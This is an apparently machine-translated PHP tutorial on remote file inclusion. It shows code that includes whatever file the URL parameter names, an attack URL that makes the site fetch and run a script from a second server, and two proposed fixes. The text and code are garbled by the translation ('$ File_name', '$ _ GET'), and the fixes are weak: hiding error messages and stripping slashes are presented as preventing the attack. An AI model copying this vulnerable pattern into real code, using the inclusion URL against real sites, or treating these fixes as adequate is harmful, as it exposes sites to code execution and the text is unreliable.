Because PHP supports using the same Function to operate on local files and remote files. Therefore, some malicious users force the PHP Code on the website to contain their own files to execute their own scripts. The following Code provides the function to include different files based on the file name in the address bar of the browser.
The code is as follows:
$ File_name = $ _ GET ["filename"]; // Obtain the current file name
Include ("$ file_name"); // contains the file
// Some Other operations
?>
In this case, you can specify different file names in the address bar to include different files and execute the function. For example, access http: // localhost/test. php in a browser? Filename = myinc. php can contain and execute the myinc. php file in the Code.
The preceding Code does not handle any errors and runs without parameters in the browser. Therefore, the following running result is displayed.
Warning: include (. php) [function. include]: failed to open stream: No such file or directory in C: \ Program Files \ xampp \ htdocs \ Bugs \ test6.php on line 3
Warning: include () [function. include]: Failed opening '. php 'for declaration (include_path = '.; c: \ Program Files \ xampp \ php \ pear \ ') in C: \ Program Files \ xampp \ htdocs \ Bugs \ test6.php on line 3
By reading this error message, the visitor can know that the current operation is a file inclusion operation. In this case, you can place a script code on your server. Note that PHP obtains the final output result of the remote server when obtaining the remote file, rather than the file itself. The script Code is on the 192.168.0.1server and the file name is hello.txt. the script Code is as follows.
The code is as follows:
Echo "hello world! ";
?>
In this case, access http: // localhost/test. php in the browser? Filename = http: // 192.168.0.1/hello.txtto run the script in hello.txt.
To solve this problem, one way is to improve the code error information so that visitors cannot know that the current script is containing the file specified by the parameter. The modified Code is as follows.
The code is as follows:
$ File_name = $ _ GET ["filename"]; // Obtain the current file name
If (! @ Include ("$ file_name.php") // contains the file
{
Die ("page browsing errors ");
}
// Some Other operations
?>
After modification, if the contained file cannot be found, the "page browsing error" error will occur, and the visitor will not be able to obtain the specific operation information of the current page.
The second method can effectively prevent remote file inclusion attacks. The method is to replace the slash "/" in the address bar parameter. In this way, when the remote file address is entered in the address bar parameters, the code cannot obtain the parameters correctly. The modified Code is as follows.
The code is as follows:
$ File_name = str_replace ('/', '', $ _ GET [" filename "]); // Obtain the current file name
If (! @ Include ("$ file_name.php") // contains the file
{
Die ("page browsing errors ");
}
// Some Other operations
?>
In this way, access http: // localhost/test. php in the browser? When filename = http: // 192.168.0.1/hello.txt, the actual file name contained in the PHP Code (Code) is http: 192.168.0.1bugstest6 _ test. The page does not contain remote files and displays error information.